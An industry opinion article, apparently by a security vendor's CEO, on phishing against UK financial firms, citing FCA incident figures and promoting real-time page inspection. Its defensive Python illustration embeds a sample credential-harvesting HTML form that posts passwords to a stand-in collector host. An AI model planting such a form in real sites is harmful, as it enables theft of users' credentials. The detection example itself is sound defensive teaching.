Fast-growing phishing attacks represent the most common type of cybersecurity threat for financial services firms in the UK today, making up the bulk of attacks that strike banks, credit unions, credit-card lenders, insurance companies and other businesses that manage money.
Financial services firms reported 93 cyberattacks in 2018, according to data from the Financial Conduct Authority (FCA), a financial services industry watchdog based in London. The data was released in response to a freedom of information request made by RSM, a network of global accounting firms. Just over half the attacks at financial services firms involved phishing, with 48 incidents reported in 2018, followed by 19 ransomware attacks. Other root causes for cyberattacks included malicious code (16 reported) and distributed denial of service attacks (10 reported).
Overall, the FCA said that financial services firms reported 819 total outages last year, with cyberattacks responsible for 11 per cent of them. In most cases the outages had less devious causes than hacking, such as third-party failures (21 per cent), hardware and software problems (19 per cent), and glitches due to change management (18 per cent). However, RSM concluded that there was still a high level of under-reporting.
The spike in cyberincidents was due in part to the introduction of the EU’s General Data Protection Regulation (GDPR), which requires all organisations to report certain kinds of security breaches. Almost 60 per cent of the reported incidents affected retail banks (486). The FCA has called on all financial firms to develop better operational resilience to recover from disruptions, and to shore up their cybersecurity defences to prevent future attacks.
Of course, phishing is not a serious threat for the UK financial industry alone; it is happening worldwide. The FCA numbers highlight a much larger global concern that continues to morph and grow through clever new phishing techniques targeting the financial sector everywhere. Phishing involves any scam in which an Internet user is tricked into revealing personal or confidential information that the scammer can then use for illicit purposes. Obviously, financial services firms offer an excellent target due to their troves of financial information.
A decreasing lifespan
These days, phishing attacks take on many forms beyond standard email links and attachments. Phishing can now be executed through social media feeds, search engines, browser extensions, pop-ups, chat bots, mobile apps, scareware, social engineering and malvertising.
HTML phishing can be delivered straight into browsers and apps, bypassing secure email gateways, next-generation antivirus endpoint security systems and advanced endpoint protections. These sneaky new attack vectors are capable of evading URL inspections and domain reputation analyses altogether.
“It is a major concern that a lot of firms seem to be trying to get the basics right on cyber,” FCA Executive Director Megan Butler said in a speech last November. Butler added that “only the largest firms have automated their detection systems to spot potential cyberattacks. Smaller firms are generally relying on old-school, manual processes – or no processes at all.”
This basic lack of protection is a big reason why phishing for data has become the first choice for the bad actors, who are becoming much more sophisticated. In most cases, employees can’t even spot the fakes, and traditional defences that rely on domain reputation and blacklists are not enough.
In addition, the lifespan of a phishing URL has decreased significantly in recent years. To evade detection, phishing crews can often gather valuable personal information and move on within 45 minutes. The bad guys know how current technologies are trying to catch them, so they have devised imaginative new strategies to evade detection. For instance, they can change domains and URLs fast enough so the blacklist-based engines cannot keep up. In other cases, malicious URLs might be hosted on compromised sites that have good domain reputations. Once people click on those sites, the attackers have already collected all the data they need within a few minutes and moved on.
By the time the security teams have caught up, those attacks are long gone and hosted somewhere else. Of the tens of thousands of new phishing sites that go live each day, the majority are hosted on compromised but otherwise legitimate domains. These sites would pass a domain reputation test, but they’re still hosting the malicious pages. Due to the fast-paced urgency of this threat, financial institutions should adopt a more modern approach to defend their data. This involves protections that can immediately determine the threat level in real-time and block the phishing hooks before they draw out valuable information.
This approach is based on advanced computer technologies that activate millions of virtual browsers in the cloud. In this way, sites can be inspected instantly by combining tools for computer vision, optical character recognition, natural language processing and active site behaviour analysis to “see” the actual site and the malicious code lurking within it. Such a real-time analysis can then be fed into machine learning algorithms to deliver a single definitive verdict: malicious or benign, with near zero false positives.
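The gap described above, between a reputation lookup and an inspection of what the page actually does, can be shown in a few lines. The following is an added illustration written for this article, not SlashNext's product or code: the reputation table, the blacklist and the two HTML pages are constructed samples, and the "brand in title" cue is a deliberately simplistic stand-in for the richer computer-vision and language analysis the text describes.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample data (not real sites): a reputation score per domain
# and a blacklist that has not yet caught up with the current campaign.
DOMAIN_REPUTATION = {"example-charity.org": 0.95, "secure-login-update.xyz": 0.05}
BLACKLIST = {"secure-login-update.xyz"}

# A credential-harvesting page planted on a compromised but reputable domain.
# Its form posts the captured password to a third-party collector host.
COMPROMISED_PAGE = """<html><title>ExampleBank - Sign in</title>
<form action="https://collector.invalid/post" method="post">
<input name="user"><input type="password" name="pass"></form></html>"""
BENIGN_PAGE = """<html><title>Example Charity - Donate</title><p>Thanks!</p></html>"""


class FormInspector(HTMLParser):
    """Collects the page title, password inputs and form submission hosts."""
    def __init__(self):
        super().__init__()
        self.title, self._in_title = "", False
        self.password_fields, self.form_hosts = 0, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "form" and a.get("action"):
            self.form_hosts.append(urlparse(a["action"]).hostname or "")
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def reputation_verdict(url):
    """Blacklist / domain-reputation check: only looks at the host name."""
    host = urlparse(url).hostname
    bad = host in BLACKLIST or DOMAIN_REPUTATION.get(host, 0.5) < 0.3
    return "malicious" if bad else "benign"


def content_verdict(url, html):
    """Behavioural check: a password form that posts off-site, or a bank
    brand in the title on a non-bank host, is treated as a phishing page."""
    host = urlparse(url).hostname
    p = FormInspector()
    p.feed(html)
    cross_domain_post = any(h and h != host for h in p.form_hosts)
    brand_mismatch = "bank" in p.title.lower() and "bank" not in host
    flagged = p.password_fields and (cross_domain_post or brand_mismatch)
    return "malicious" if flagged else "benign"
```

With these samples the reputation check passes the page on the compromised charity domain, while the content check flags it, which is exactly the case the text argues blacklists cannot cover.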
We know the phishing villains will continue to devise creative new ways of attacking the networks and employees of financial services firms. Guarding those assets will require equal amounts of creativity to stop these attacks before they can take effect.
Atif Mushtaq, CEO and founder, SlashNext